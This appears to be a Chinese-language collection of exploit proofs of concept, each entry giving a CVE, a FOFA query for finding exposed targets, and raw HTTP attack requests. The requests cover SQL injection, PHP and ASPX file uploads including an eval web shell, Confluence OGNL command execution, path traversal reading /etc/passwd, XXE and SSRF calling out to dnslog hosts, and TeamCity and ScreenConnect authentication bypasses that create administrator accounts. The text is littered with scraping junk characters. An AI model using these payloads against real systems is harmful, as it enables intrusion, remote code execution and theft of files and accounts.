CVE-2024-1254% `2 F% h3 w4 ^' e4 M/ R
FOFA:title="Smart管理平台"
6 x, R* o: L2 r/ \先登录进入系统,默认账号密码为admin/admin1 }3 L+ ~3 S' [- S5 _) w9 U* J
POST /sysmanage/sysmanageajax.php HTTP/1.11- [6 N3 J8 n  P( @/ L
Host: x.x.x.x
0 X: y" T$ e- D! ?, g8 i  P( e. [Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
, x" d  J8 e6 ^, z: MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0! }5 J: a, J4 q# o- y* A
Accept: */*
; W$ J) }' X. o7 fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! M; F! W' C' i; M+ Y4 Q8 mAccept-Encoding: gzip, deflate
, A. p3 X; g- BContent-Type: application/x-www-form-urlencoded;
+ l* q9 {8 D  _; G1 VContent-Length: 109
8 W+ R7 v& ~" Q# w5 V5 E' z7 H. B6 eOrigin: https://58.18.133.60:8443
1 Q" H6 t' a- cReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php( g6 r' j' r+ r# F
Sec-Fetch-Dest: empty$ Y$ _% N5 ^& M0 g* Y3 v/ @" S
Sec-Fetch-Mode: cors
( I( z# \; E8 W$ ]$ t4 f* S9 c$ zSec-Fetch-Site: same-origin6 e+ R3 W, p6 A4 ?: R
X-Forwarded-For: 1.1.1.19 M4 o6 O+ Y% U5 F' R. M
X-Originating-Ip: 1.1.1.1
, ?5 B; }$ V+ @$ o( H7 p6 _X-Remote-Ip: 1.1.1.1
, e' c( n* `" G, GX-Remote-Addr: 1.1.1.18 S& `/ L: ]" ~8 g# A5 b8 @4 @7 i/ Q
Te: trailers- W" s) b1 n$ M0 Q. E
Connection: close& J) Z5 |8 `3 K! F# ~
) O; z7 }4 \+ ?: V
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234567 D6 Q. |2 ~1 G6 Q. b3 y

: z; G+ \) C9 `5 Y6 d5 A
+ n7 Y# T& a+ d* y120. 北京百绰智能S40管理平台导入web.php任意文件上传
$ e1 |' F& M: d! b2 z: ^CVE-2024-12532 n6 W5 ~/ x0 i5 _( u3 G! X
FOFA:title="Smart管理平台"; R6 d5 {2 e, \; m# H; `
POST /useratte/web.php? HTTP/1.1
" g9 L6 `! c2 F" C/ XHost: ip:port
4 l2 S+ G/ Y1 g: b; [2 z0 R) Z; ?6 hCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db8 Z* f2 I8 Y4 x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
9 T* ^& _/ R$ r6 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( z2 R; Y5 ~4 u3 c" X9 y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' E% r9 ~9 i4 B: kAccept-Encoding: gzip, deflate9 G& |1 P# ?: @. ^$ U1 ~: ]
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793283 h% }) N+ Z' R
Content-Length: 597
4 Z" g3 y4 Z6 cOrigin: https://ip:port/ P9 Q5 \6 d- S7 o0 M! b
Referer: https://ip:port/sysmanage/licence.php1 {8 M3 I0 y  X' o2 o, {
Upgrade-Insecure-Requests: 1& I$ j$ z+ _2 g" e0 u3 I5 V# W
Sec-Fetch-Dest: document9 x" C' E& s: z8 s7 d& x4 V- M$ T
Sec-Fetch-Mode: navigate
7 Q( O1 z3 E. s/ L6 \1 hSec-Fetch-Site: same-origin
) X; B1 H2 C, c! J4 b8 jSec-Fetch-User: ?1# N; ]- ~3 R( l8 p
Te: trailers& S$ |" i# Z5 M# y
Connection: close
: e, [3 n! p9 p  V! c2 m& ?' M* F# o3 I4 U. Q$ R
-----------------------------42328904123665875270630079328
4 v! P  d9 r4 l, O# R/ bContent-Disposition: form-data; name="file_upload"; filename="2.php"
0 c% b. v# P2 L1 Q( p( d$ r. v$ g' NContent-Type: application/octet-stream+ }" u1 r$ U' @4 g3 e# S

  u5 O# ^+ h. w  J6 i* P7 J9 b6 H<?php phpinfo()?>
- [3 g0 \3 q5 F* h  |2 Y) ?-----------------------------42328904123665875270630079328
- u& @$ c; C% |' ?! Z- k* IContent-Disposition: form-data; name="id_type"/ u" ~! P/ ]- Q
: g. V- J; {; X! T7 y- v, r! q
1
) a( X: z+ h, T4 H-----------------------------42328904123665875270630079328
! _0 a4 M8 c5 w  V4 S1 WContent-Disposition: form-data; name="1_ck"
3 x+ G% k5 L  t  S* p7 w3 h2 r$ U
* z" W, `' \0 }1 P* }4 R1_radhttp
2 J  E0 j9 _! i7 }* K" `-----------------------------42328904123665875270630079328& F; G+ u3 q. K% n5 t4 F# z
Content-Disposition: form-data; name="mode"7 o4 ]/ V+ t( G5 q: H8 K
. [/ g( t) a9 r
import+ z, k! ?& a" _- q! N
-----------------------------42328904123665875270630079328
* d5 [+ \) K+ a2 S' Z+ J. p. t$ P0 O* b
* `! p9 N- n; p% u; t
文件路径/upload/2.php5 X/ n: _; F% l: M
9 ^" ?( E' D( p2 @; Y2 P- ^- w% V
121. 北京百绰智能S42管理平台userattestation.php任意文件上传- @1 Z7 s9 W& s  |
CVE-2024-1918
2 ~% k: C8 u- o5 G3 S( t7 CFOFA:title="Smart管理平台") t6 f6 L9 X6 c; f# @' e
POST /useratte/userattestation.php HTTP/1.17 ~2 \; ]/ K+ k" l  t# t
Host: 192.168.40.130:84432 J% B2 c0 x! {' W9 ^/ |+ [+ T
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50+ x1 E; M3 N5 i& r
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko: j6 N) J% C# w6 J5 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. @: f, y+ u7 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; V$ U- y) J/ [: z& a" D; w; CAccept-Encoding: gzip, deflate1 O) v) W5 ]* J. I. c
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 e. W% B% ?1 T& ]" C# o
Content-Length: 5925 }  a6 w% a4 S& }3 D' m- c% m
Origin: https://192.168.40.130:8443
" e9 E$ @( }% H' U8 E7 C8 vUpgrade-Insecure-Requests: 14 g  m  c; O) D6 {4 Z2 C1 W
Sec-Fetch-Dest: document
- u; G9 U  i( C& {" ]. mSec-Fetch-Mode: navigate2 w) u! S4 o$ M
Sec-Fetch-Site: same-origin* i5 G. A% u) R+ Y/ L
Sec-Fetch-User: ?1
2 ^& J4 O% A" e5 `# Z1 l4 L7 S" _Te: trailers; S: e" |8 a1 E' G$ d& o, t9 L
Connection: close% n4 Z/ K8 W8 c! R

1 S, q' f2 C9 e-----------------------------42328904123665875270630079328
& k4 b9 O8 M' z/ @$ e# wContent-Disposition: form-data; name="web_img"; filename="1.php"$ f# O5 ?+ D; R* k% m( i; {$ b2 C
Content-Type: application/octet-stream' G$ M$ P5 ^: L' O* D) v3 n" y

' c8 X! l8 K( a0 N" m<?php phpinfo();?>. m2 h% \% w0 X0 b
-----------------------------423289041236658752706300793283 S. F0 k3 n! V: ^
Content-Disposition: form-data; name="id_type"7 t- g& L. p+ O6 a

; T& U4 T( F' k) f$ d6 j' \6 O! L1# |1 X! ^- {' X% P, ^
-----------------------------42328904123665875270630079328& q% W3 h3 H$ d/ l$ F' N1 u
Content-Disposition: form-data; name="1_ck"
: k* L  {  v5 n) Y# |8 X0 U( E0 Q: F7 J" c# A! r8 ]
1_radhttp
- V4 Z% B% m6 G" P% h-----------------------------423289041236658752706300793286 H+ J5 ^, G! z1 G% @* ^' J
Content-Disposition: form-data; name="hidwel"
. F" h+ C1 K) b0 x, M0 o( }  D  f) e5 z6 E1 t' F$ t) p
set
; r" b  Y4 @6 ~! ^8 C-----------------------------42328904123665875270630079328
# E9 s/ S. I3 p& P% \; [
8 O' t- a% P5 S8 a8 I
4 I7 w5 j7 {* @3 Bboot/web/upload/weblogo/1.php
# H6 t7 T7 Q. U3 Q3 H
0 N* Q% S) x+ H: h9 |# [8 ]122. 北京百绰智能s200管理平台/importexport.php sql注入$ _( O0 a! N6 C8 [+ k
CVE-2024-27718FOFA:title="Smart管理平台"
7 U6 ^" [$ H& o/ C! l% F其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
9 X$ L7 y4 o( x. RGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
7 D. h( b9 e# J  c' uHost: x.x.x.x4 y* V$ s  w/ \
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
3 J) v1 s" @: t3 A; {6 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 F: i" z* A2 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ f- L! a  X. |9 w$ wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% Q% ]& u2 Q6 X
Accept-Encoding: gzip, deflate, br" t# t) v# e4 e) Q! x' }* [
Upgrade-Insecure-Requests: 1
  c/ \: g, @) G) S" v4 J. ESec-Fetch-Dest: document! J8 [+ l+ s) s% f) a+ J1 E: J
Sec-Fetch-Mode: navigate) d3 t- G/ F$ @6 d8 h& ?2 R
Sec-Fetch-Site: none
0 A8 w1 ]1 }! ~% `' D' QSec-Fetch-User: ?1
$ p; b: ?" i$ ^3 @7 V2 T' eTe: trailers& U* i9 e' O8 [  h: ~: Q' s
Connection: close4 Z, j; B2 C* g

& C; a; g$ b! F4 p
  x2 Q5 L. r- ~" X' d4 V6 x123. Atlassian Confluence 模板注入代码执行
0 F. u9 I6 @4 y5 }/ Q' QFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"3 p6 R! Z5 \0 @1 e5 k9 n; U) j6 D
POST /template/aui/text-inline.vm HTTP/1.1
* S9 \" Y' [) a+ D7 ~( Y& |4 M) xHost: localhost:80905 p5 K% T) Q( R. Y8 y4 @* F
Accept-Encoding: gzip, deflate, br4 C# ?: Z9 t/ ]+ b9 F* {  z) E
Accept: */*2 A* r0 R5 J3 E2 r2 U' j
Accept-Language: en-US;q=0.9,en;q=0.8
6 {* t) T* f6 ?: zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.364 n3 O2 O2 L! }: N- M0 f6 u
Connection: close
  T$ F0 {, Z( O+ h: m2 _Content-Type: application/x-www-form-urlencoded
9 u# k+ L/ d  L% x1 ?2 z7 q' b/ m7 ^
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
  V4 @2 `) K% {6 n( ~% I5 }. V9 s. R7 _0 N: E( u

, p+ E( \1 i* a2 \+ B  v$ i124. 湖南建研工程质量检测系统任意文件上传
7 K- E' ?7 A; E% p: {' ZFOFA:body="/Content/Theme/Standard/webSite/login.css"
# y" c9 |1 X) X$ C% _9 L$ UPOST /Scripts/admintool?type=updatefile HTTP/1.1- [& O# @: V+ O3 \* Z, U
Host: 192.168.40.130:8282
0 C5 z* t6 y6 F$ e- A4 B; RUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36' {+ X* T3 E/ d; J0 z, ~
Content-Length: 72
0 P7 o* l" r- _. pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5 I  E: X3 }, f* A5 d7 gAccept-Encoding: gzip, deflate, br1 C, T& K6 B4 s) B% j: e5 B; S7 J: ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( G4 c2 h8 H4 ?
Connection: close, [. [& L: y6 P- K
Content-Type: application/x-www-form-urlencoded2 `# Z1 \. }0 B3 j+ e/ M
& n0 w# c: s1 j5 n7 n5 E3 M
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
0 K; t9 @  g" z; o3 d' u0 s+ q6 _" [2 K6 Z7 J

' u  v, B. L" P$ C; W& Qhttp://192.168.40.130:8282/Scripts/abcgcg.aspx' w, L/ n: @$ b, l: A: _# p1 E: [6 o( @
# i" C3 w4 h" Z0 v' G" F5 U1 [6 ~: y
125. ConnectWise ScreenConnect身份验证绕过
- v0 A& i) {4 }+ w$ P6 s2 DCVE-2024-1709; p8 @9 ~/ V/ C& Q
FOFA:icon_hash="-82958153"
% W+ X' F& E* `- o3 Lhttps://github.com/watchtowrlabs ... bypass-add-user-poc
/ z* a  D2 o% m, S5 r: M4 X, H& I
% X: c0 K4 f- @4 v/ m, P
, r5 X6 Y7 [/ ]/ Y+ T# S2 y0 \" W使用方法3 j. z; A6 i+ x3 a) Z% t
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!6 s: g" {. O9 ]7 b

. b( u2 f1 A. i! T0 d3 C! Q% D! ~3 Q; v: {' i: ~3 H
创建好用户后直接登录后台,可以执行系统命令。
" ]) }9 x2 @  _/ J) ^3 c# l/ V3 u, }1 b( |+ d" s% C
126. Aiohttp 路径遍历* _* M4 r  {; G( ^9 P5 ?
FOFA:title=="ComfyUI"
2 ~: d% D2 c% [- i! ^' MGET /static/../../../../../etc/passwd HTTP/1.1% ~9 T% v9 s$ W4 X7 l: g6 p
Host: x.x.x.x
9 Y; F( ]/ c+ d/ RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
/ n8 u' _, U: y' L: Y, SConnection: close
' _1 w) h9 K6 P8 v' `" R$ F- CAccept: */*3 ^) J0 j$ q" {2 g% x" m/ A& |
Accept-Language: en& t4 V# F1 ]5 H* I
Accept-Encoding: gzip* z) g. R& K9 P: I  h; Q; [

7 A/ L4 T8 W! p6 ]% \/ N" q7 X2 F( L1 x' p6 M; Q0 N
127. 广联达Linkworks DataExchange.ashx XXE& U/ a$ ]0 N3 M9 y6 J* V
FOFA:body="Services/Identification/login.ashx" , f3 ]% k% i. c) s, M7 z! F, ^! H
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1* q* o+ F7 _! s( _
Host: 192.168.40.130:88882 S: C/ o$ M. H+ `* e1 y. |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
$ _5 I8 z/ y1 r) ^0 ?* E1 g* S! xContent-Length: 4152 Z* J# P3 f! K8 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: h% K$ x/ y, ^8 T4 D2 XAccept-Encoding: gzip, deflate) S5 e3 |% t: w
Accept-Language: zh-CN,zh;q=0.9
% l, }* r0 Q/ B$ f" M- E& NConnection: close8 X0 ]7 O7 y9 ?. F& O
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe04 q$ Z0 i  `( F6 e! x* m1 R
Purpose: prefetch! f4 T; C& Z3 ~) o. z7 c" M
Sec-Purpose: prefetch;prerender8 Y8 ?6 J! O+ r9 o% j) E

: F! `- S/ |3 N* h! o# y------WebKitFormBoundaryJGgV5l5ta05yAIe0
! u* F% g5 e% U# W% P, gContent-Disposition: form-data;name="SystemName"8 y. M) U$ K# `

+ l: m% ]! S* ^: a/ i  @( EBIM; P# ^% W& C5 ^
------WebKitFormBoundaryJGgV5l5ta05yAIe0) S, j, n. a4 a
Content-Disposition: form-data;name="Params"
( M8 F! u3 Q* C' K; bContent-Type: text/plain$ r5 g4 l5 i" \. ]( A

1 T1 f- @8 o% ]<?xml version="1.0" encoding="UTF-8"?>3 f! R! O, w' _; B
<!DOCTYPE test [5 g1 ]7 y4 O% n8 @, K. \
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
6 E/ x3 K# G; W, U/ Q8 M6 B]
. I; J: l. }4 q>
; }! F; K, L3 a/ n1 N<test>&t;</test>
# j  c: f- z9 E------WebKitFormBoundaryJGgV5l5ta05yAIe0--
1 o) b3 X! T3 D5 ?/ o$ y: F; W8 O. T
$ C) ^) ~3 F2 c; ^, v) i% d; f! A" C/ Q& m! m! V( Y

% S6 _7 W+ h3 H  t6 m! n128. Adobe ColdFusion 反序列化
. ^, P, O) J# M& FCVE-2023-382037 [/ u7 I' p: ?# |0 q! s0 y# c. ^! n
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
. m0 G# ?7 C+ B0 _4 o3 ~+ ?% W& q* ?FOFA:app="Adobe-ColdFusion": ]  [/ S% ]" L* C$ L
PAYLOAD! C  o) o5 _) g( Y& o& H8 A% _2 u5 d

0 [$ u+ p+ K! T! ~5 C( w129. Adobe ColdFusion 任意文件读取
) J5 D* R. T4 Y9 M( GCVE-2024-20767! W* _( n* E! v
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"$ ]+ [. S' E" Q
第一步,获取uuid& s, E9 d! E9 i8 S0 X7 g
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1/ G* {7 O& t6 W# R( S# ^5 C
Host: x.x.x.x  i9 A& u+ g6 P2 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: R% W6 O( W6 Y, X  GAccept: */*
, P! ?; W8 o; gAccept-Encoding: gzip, deflate  ]7 E- F& P. \- Y& s
Connection: close3 |; q+ P0 `9 X
$ n- h7 u8 O- l: i: P% K7 ?* U% Z8 k
+ k+ @0 R, @9 ]6 Y1 q8 W9 _
第二步,读取/etc/passwd文件
' `( Q4 a, w# B) K' a- vGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
8 @7 F( T0 J0 p  R4 HHost: x.x.x.x) B: f5 [/ j! D8 T, K. Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 n& G/ h6 D( C9 o- G( ~/ MAccept: */*
, f( k/ v: {' C* gAccept-Encoding: gzip, deflate
" y. b/ I. g! j6 \* D! g& cConnection: close# C) d$ W0 u8 h+ E% M3 q
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
+ Z: K% q' \8 A6 }1 X" w- v: j
; q; E) a7 u7 v  D4 u: M/ }1 v& Z/ m- W# l" E
130. Laykefu客服系统任意文件上传
  i) V5 ?) ^1 O4 g4 g8 d) `) PFOFA:icon_hash="-334624619"2 ~% F& l% d  z8 {% `3 u
POST /admin/users/upavatar.html HTTP/1.1
  Y3 j6 h0 {5 jHost: 127.0.0.10 E3 e/ I3 Z9 l* a5 @* x
Accept: application/json, text/javascript, */*; q=0.01* D6 B* H0 _! y" C; |- P
X-Requested-With: XMLHttpRequest
7 N2 b  g# }: ~1 sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
2 B* c  l. D  j" r1 p5 WContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR: s8 F) q) n: N& x/ B4 w
Accept-Encoding: gzip, deflate* P& Z: ~% x/ v
Accept-Language: zh-CN,zh;q=0.91 Z/ D  Q/ X! p
Cookie: user_name=1; user_id=3
! k7 L9 \7 s7 [6 a$ \& X- i9 A# HConnection: close
( ?4 ?7 ?7 R! b2 ~6 y0 a; ^; O& s; i. X2 a% X( P6 e' M
------WebKitFormBoundary3OCVBiwBVsNuB2kR
* O2 `5 s' E" R  o  v8 _Content-Disposition: form-data; name="file"; filename="1.php"2 X6 i' a- w6 v
Content-Type: image/png- ^; v' [3 I) c: [8 j; h# n
- ~& M; m( t8 u( g- k% P$ b* a
<?php phpinfo();@eval($_POST['sec']);?>
! ]- g0 e; f3 s; o9 X& a7 X------WebKitFormBoundary3OCVBiwBVsNuB2kR--( g; P) |0 t4 x

* O# i* N2 Q! v. ^! O
" m- A1 i) u' [: W5 q8 Z  f0 A5 g131. Mini-Tmall <=20231017 SQL注入
9 V9 @* A$ \9 ~4 qFOFA:icon_hash="-2087517259"
+ H! p8 a- p) I( P后台地址:http://localhost:8080/tmall/admin# {$ H8 S  H7 f2 R
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
) e# ?( A5 e% Q- m# r; K
1 h2 ?- g5 _  Z. m( j' R. f, ^7 O132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
: C' |' m# y# _& j- lCVE-2024-27198
% H/ p- c  _9 ?3 K- b$ q4 sFOFA:body="Log in to TeamCity"
! C$ T+ `1 f6 j+ ^* xPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
* b" A  S% D! M" u  cHost: 192.168.40.130:81114 t! @( i. g; t, y- g! E, F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ Y. x/ o8 |4 g# L$ ^, `Accept: */*
! |  j6 X6 @, n/ s% K( H. @Content-Type: application/json. R1 G5 s5 J3 C2 c; x
Accept-Encoding: gzip, deflate
. o0 R2 f' P) C3 t& N# f  z/ n  U  D6 S( a, B1 |. Q
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}! S) U& s2 }/ w: X* z5 U
3 m: @7 C$ X, C) E" q( c3 Y8 g
* h3 n- l' Z, K
CVE-2024-27199/ ^. w5 |9 z. w! |: f+ M$ f
/res/../admin/diagnostic.jsp0 i$ H( T( l5 T3 P6 ?
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/ r8 ~0 F$ h: f3 ~- h/update/../admin/diagnostic.jsp; ]) B4 n4 N" k8 c# n( h3 p

: D. o7 ^. C6 n9 `, h9 {* ?; {& J
$ \& n6 D1 }  e5 c: A+ {CVE-2024-27198-RCE.py4 e( B$ w# ~- B. t8 V0 m; S

* G! A, a2 P# g7 \9 B0 i: d5 h. a133. H5 云商城 file.php 文件上传
: H+ X* r% q: }  k6 tFOFA:body="/public/qbsp.php"
) h; G/ F' k! N. @  i- e. mPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
  B/ q" b4 f/ I" m0 EHost: your-ip
. N2 T! t; D3 O: J. s# YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 N# i8 C+ ^& G& y$ i  x3 h5 z- q; O  Z" R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx1 e3 D: K5 Q( V. R% ~

* c6 B1 H. G6 k: c; C------WebKitFormBoundaryFQqYtrIWb8iBxUCx1 m) I( Q, r: s" }" h$ Z) U
Content-Disposition: form-data; name="file"; filename="rce.php"
3 _: \1 v, q+ y7 [; AContent-Type: application/octet-stream% v4 S3 S% C+ I) t( a
* {" Q  {2 i# y4 _& Q. C3 z7 A5 Y, w2 Z
<?php system("cat /etc/passwd");unlink(__FILE__);?>! U- W3 S( T6 [) q" ?
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
3 `$ }. Y) x$ q7 d
8 {6 e* v- P) X+ ~9 b! P1 t; Z6 l$ `
% }7 c" A1 O+ o1 [" P
134. 网康NS-ASG应用安全网关index.php sql注入) M' \& b5 p3 e  f- o
CVE-2024-2330! M- p% X" m$ y' s
Netentsec NS-ASG Application Security Gateway 6.3版本
# N+ K* `% s- l9 cFOFA:app="网康科技-NS-ASG安全网关"
  v" l0 O2 s; C4 LPOST /protocol/index.php HTTP/1.1( E6 ?9 \8 o# J. Z/ j+ E7 t1 z
Host: x.x.x.x2 ^! |! \# J! x, V; e; K
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de. w" r1 b( d: b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0* F8 c& J! M$ ~, }5 f5 D5 _" u1 D
Accept: */*( @- B- ~/ t$ u8 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 d/ C3 a  \! O* ^
Accept-Encoding: gzip, deflate
8 }8 M. v4 D- {5 M( ^, ~! D/ HSec-Fetch-Dest: empty8 D$ L* g5 A& u3 q
Sec-Fetch-Mode: cors
$ O9 Q/ ^2 w$ p; ~6 S& d6 oSec-Fetch-Site: same-origin4 _4 a: k0 _7 f
Te: trailers
+ E: _. B) [4 R0 f0 ^9 TConnection: close3 W# u* M% q) i
Content-Type: application/x-www-form-urlencoded
" D0 n+ I2 z: p1 g3 Q- p3 i, QContent-Length: 263
( q3 O8 Y; a8 s1 i2 b8 J
- n& S" G. k3 f6 d7 c7 R) pjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
0 p$ E5 K3 c1 B
8 K3 T; Z- V$ j1 J+ a( f9 a
7 T3 {& B+ |$ M/ B9 Y' a& `135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 W3 ~9 n, {* U& `2 y! FCVE-2024-2022
+ h6 r3 S& e/ a4 v% a+ n& ^4 F( I- Q6 k1 cNetentsec NS-ASG Application Security Gateway 6.3版本
: P; X9 L  W2 c) h1 D' q% i* fFOFA:app="网康科技-NS-ASG安全网关"
& c5 V6 O: O, \; @# r1 oGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
! k6 t  T7 p4 ?Host: x.x.x.x
' c( Y* p6 m* @/ G& MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; \7 X4 c4 B0 B: VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: T' U4 F) j' k- H, J& }9 AAccept-Encoding: gzip, deflate1 ~8 W, e0 o! x8 ~( n
Accept-Language: zh-CN,zh;q=0.9) A! @+ s; C' S  k# y
Connection: close. \( K3 K& e2 F
. ]1 x2 m0 P* r: w  F* V! K; O# @
; p5 H+ T1 K% w
136. NextChat cors SSRF; ~# Q) n8 ?8 k" A9 P  e
CVE-2023-49785
3 M1 i$ J  d8 j# J: ]9 gFOFA:title="NextChat"
! S2 T  Y0 @) \! qGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
! l, ]+ y1 g5 Q3 C$ d1 kHost: x.x.x.x:100005 n0 a$ B+ E1 `6 C  t' ?" g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' a) S+ e% P' `6 ~% Q' L, Q
Connection: close
" Z. I- I9 e0 fAccept: */*, u  ^7 J4 j1 f8 u, m
Accept-Language: en( h( P0 `3 f+ H
Accept-Encoding: gzip
' W* W0 P1 o; L) V( h! e
. C) L, ^, \3 k9 u
7 V' F  n* ~" b& l137. 福建科立迅通信指挥调度平台down_file.php sql注入6 j" e" q! r0 |
CVE-2024-26208 l: g1 J6 t' O) D  n
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" K, b8 F, D# A+ [  ?+ h( J
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1; @' F- E6 S1 d! ]
Host: x.x.x.x
3 [: S. O$ A8 y/ X2 h' b- t8 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ ?1 u) F' U6 j/ ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 j+ Q. t8 B' T  j1 ~# Z) t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: v/ V. a% y) X( m$ mAccept-Encoding: gzip, deflate, br
. J5 }; z. `& l) c1 D& i( MConnection: close' U  U% T1 d, D9 O4 y1 j
